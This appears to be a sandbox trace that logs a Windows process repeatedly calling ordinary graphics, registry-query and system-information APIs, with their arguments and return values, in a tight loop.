RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.133] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x580401cd [0088.133] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x560401d0 [0088.133] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f06 [0088.133] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f07 [0088.133] CombineRgn (hrgnDst=0x1040f06, hrgnSrc1=0x580401cd, hrgnSrc2=0x560401d0, iMode=1) returned 1 [0088.133] CombineRgn (hrgnDst=0x1040f07, hrgnSrc1=0x580401cd, hrgnSrc2=0x560401d0, iMode=4) returned 2 [0088.133] CreateSolidBrush (color=0xff) returned 0x2100e7b [0088.133] CreateSolidBrush (color=0xff0000) returned 0x1100f08 [0088.133] DeleteObject (ho=0x1100f08) returned 1 [0088.133] DeleteObject (ho=0x560401d0) returned 1 [0088.133] DeleteObject (ho=0x580401cd) returned 1 [0088.133] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.133] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.133] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.133] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.133] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.133] BeginPath (hdc=0x0) returned 0 [0088.133] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.133] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.133] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.133] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.133] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.133] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.133] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.133] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.133] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x570401d0 [0088.133] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x590401cd [0088.134] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f09 [0088.134] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f0a [0088.134] CombineRgn (hrgnDst=0x1040f09, hrgnSrc1=0x570401d0, hrgnSrc2=0x590401cd, iMode=1) returned 1 [0088.134] CombineRgn (hrgnDst=0x1040f0a, hrgnSrc1=0x570401d0, hrgnSrc2=0x590401cd, iMode=4) returned 2 [0088.134] CreateSolidBrush (color=0xff) returned 0x2100f08 [0088.134] CreateSolidBrush (color=0xff0000) returned 0x1100f0b [0088.134] DeleteObject (ho=0x1100f0b) returned 1 [0088.134] DeleteObject (ho=0x590401cd) returned 1 [0088.134] DeleteObject (ho=0x570401d0) returned 1 [0088.134] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.134] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.134] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.134] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.134] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.134] BeginPath (hdc=0x0) returned 0 [0088.134] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.134] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.134] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.134] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.134] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.134] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.134] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.134] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.134] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5a0401cd [0088.134] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x580401d0 [0088.134] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f0c [0088.134] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f0d [0088.134] CombineRgn (hrgnDst=0x1040f0c, hrgnSrc1=0x5a0401cd, hrgnSrc2=0x580401d0, iMode=1) returned 1 [0088.134] CombineRgn (hrgnDst=0x1040f0d, hrgnSrc1=0x5a0401cd, hrgnSrc2=0x580401d0, iMode=4) returned 2 [0088.134] CreateSolidBrush (color=0xff) returned 0x2100f0b [0088.134] CreateSolidBrush (color=0xff0000) returned 0x1100f0e [0088.134] DeleteObject (ho=0x1100f0e) returned 1 [0088.134] DeleteObject (ho=0x580401d0) returned 1 [0088.134] DeleteObject (ho=0x5a0401cd) returned 1 [0088.134] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.134] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.134] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.134] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.134] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.135] BeginPath (hdc=0x0) returned 0 [0088.135] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.135] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.135] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.135] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.135] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.135] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.135] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.135] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.135] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x590401d0 [0088.135] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5b0401cd [0088.135] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f0f [0088.135] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f10 [0088.135] CombineRgn (hrgnDst=0x1040f0f, hrgnSrc1=0x590401d0, hrgnSrc2=0x5b0401cd, iMode=1) returned 1 [0088.135] CombineRgn (hrgnDst=0x1040f10, hrgnSrc1=0x590401d0, hrgnSrc2=0x5b0401cd, iMode=4) returned 2 [0088.135] CreateSolidBrush (color=0xff) returned 0x2100f0e [0088.135] CreateSolidBrush (color=0xff0000) returned 0x1100f11 [0088.135] DeleteObject (ho=0x1100f11) returned 1 [0088.135] DeleteObject (ho=0x5b0401cd) returned 1 [0088.135] DeleteObject (ho=0x590401d0) returned 1 [0088.135] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.135] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.135] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.135] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.135] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.135] BeginPath (hdc=0x0) returned 0 [0088.135] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.135] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.135] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.135] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.135] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.135] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.135] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.135] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.135] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5c0401cd [0088.135] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5a0401d0 [0088.135] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f12 [0088.136] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f13 [0088.136] CombineRgn (hrgnDst=0x1040f12, hrgnSrc1=0x5c0401cd, hrgnSrc2=0x5a0401d0, iMode=1) returned 1 [0088.136] CombineRgn (hrgnDst=0x1040f13, hrgnSrc1=0x5c0401cd, hrgnSrc2=0x5a0401d0, iMode=4) returned 2 [0088.136] CreateSolidBrush (color=0xff) returned 0x2100f11 [0088.136] CreateSolidBrush (color=0xff0000) returned 0x1100f14 [0088.136] DeleteObject (ho=0x1100f14) returned 1 [0088.136] DeleteObject (ho=0x5a0401d0) returned 1 [0088.136] DeleteObject (ho=0x5c0401cd) returned 1 [0088.136] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.136] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.136] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.136] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.136] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.136] BeginPath (hdc=0x0) returned 0 [0088.136] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.136] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.136] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.136] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.136] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.136] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.136] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.136] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.136] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5b0401d0 [0088.136] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5d0401cd [0088.136] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f15 [0088.136] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f16 [0088.136] CombineRgn (hrgnDst=0x1040f15, hrgnSrc1=0x5b0401d0, hrgnSrc2=0x5d0401cd, iMode=1) returned 1 [0088.136] CombineRgn (hrgnDst=0x1040f16, hrgnSrc1=0x5b0401d0, hrgnSrc2=0x5d0401cd, iMode=4) returned 2 [0088.136] CreateSolidBrush (color=0xff) returned 0x2100f14 [0088.136] CreateSolidBrush (color=0xff0000) returned 0x1100f17 [0088.136] DeleteObject (ho=0x1100f17) returned 1 [0088.136] DeleteObject (ho=0x5d0401cd) returned 1 [0088.136] DeleteObject (ho=0x5b0401d0) returned 1 [0088.136] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.137] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.137] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.137] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.137] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.137] BeginPath (hdc=0x0) returned 0 [0088.137] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.137] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.137] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.137] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.137] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.137] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.137] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.137] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.137] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5e0401cd [0088.137] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5c0401d0 [0088.137] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f18 [0088.137] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f19 [0088.137] CombineRgn (hrgnDst=0x1040f18, hrgnSrc1=0x5e0401cd, hrgnSrc2=0x5c0401d0, iMode=1) returned 1 [0088.137] CombineRgn (hrgnDst=0x1040f19, hrgnSrc1=0x5e0401cd, hrgnSrc2=0x5c0401d0, iMode=4) returned 2 [0088.137] CreateSolidBrush (color=0xff) returned 0x2100f17 [0088.137] CreateSolidBrush (color=0xff0000) returned 0x1100f1a [0088.137] DeleteObject (ho=0x1100f1a) returned 1 [0088.137] DeleteObject (ho=0x5c0401d0) returned 1 [0088.137] DeleteObject (ho=0x5e0401cd) returned 1 [0088.137] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.137] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.137] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.137] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.137] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.137] BeginPath (hdc=0x0) returned 0 [0088.137] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.137] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.137] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.137] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.137] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.137] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.138] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.138] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.138] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5d0401d0 [0088.138] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5f0401cd [0088.138] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f1b [0088.138] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f1c [0088.138] CombineRgn (hrgnDst=0x1040f1b, hrgnSrc1=0x5d0401d0, hrgnSrc2=0x5f0401cd, iMode=1) returned 1 [0088.138] CombineRgn (hrgnDst=0x1040f1c, hrgnSrc1=0x5d0401d0, hrgnSrc2=0x5f0401cd, iMode=4) returned 2 [0088.138] CreateSolidBrush (color=0xff) returned 0x2100f1a [0088.138] CreateSolidBrush (color=0xff0000) returned 0x1100f1d [0088.138] DeleteObject (ho=0x1100f1d) returned 1 [0088.138] DeleteObject (ho=0x5f0401cd) returned 1 [0088.138] DeleteObject (ho=0x5d0401d0) returned 1 [0088.138] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.138] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.138] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.138] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.138] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.138] BeginPath (hdc=0x0) returned 0 [0088.138] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.138] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.138] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.138] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.138] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.138] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.138] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.138] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.138] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x600401cd [0088.138] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5e0401d0 [0088.138] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f1e [0088.138] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f1f [0088.138] CombineRgn (hrgnDst=0x1040f1e, hrgnSrc1=0x600401cd, hrgnSrc2=0x5e0401d0, iMode=1) returned 1 [0088.138] CombineRgn (hrgnDst=0x1040f1f, hrgnSrc1=0x600401cd, hrgnSrc2=0x5e0401d0, iMode=4) returned 2 [0088.138] CreateSolidBrush (color=0xff) returned 0x2100f1d [0088.138] CreateSolidBrush (color=0xff0000) returned 0x1100f20 [0088.139] DeleteObject (ho=0x1100f20) returned 1 [0088.139] DeleteObject (ho=0x5e0401d0) returned 1 [0088.139] DeleteObject (ho=0x600401cd) returned 1 [0088.139] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.139] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.139] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.139] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.139] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.139] BeginPath (hdc=0x0) returned 0 [0088.139] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.139] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.139] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.139] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.139] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.139] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.139] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.139] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.139] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5f0401d0 [0088.139] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x610401cd [0088.139] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f21 [0088.139] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f22 [0088.139] CombineRgn (hrgnDst=0x1040f21, hrgnSrc1=0x5f0401d0, hrgnSrc2=0x610401cd, iMode=1) returned 1 [0088.139] CombineRgn (hrgnDst=0x1040f22, hrgnSrc1=0x5f0401d0, hrgnSrc2=0x610401cd, iMode=4) returned 2 [0088.139] CreateSolidBrush (color=0xff) returned 0x2100f20 [0088.139] CreateSolidBrush (color=0xff0000) returned 0x1100f23 [0088.139] DeleteObject (ho=0x1100f23) returned 1 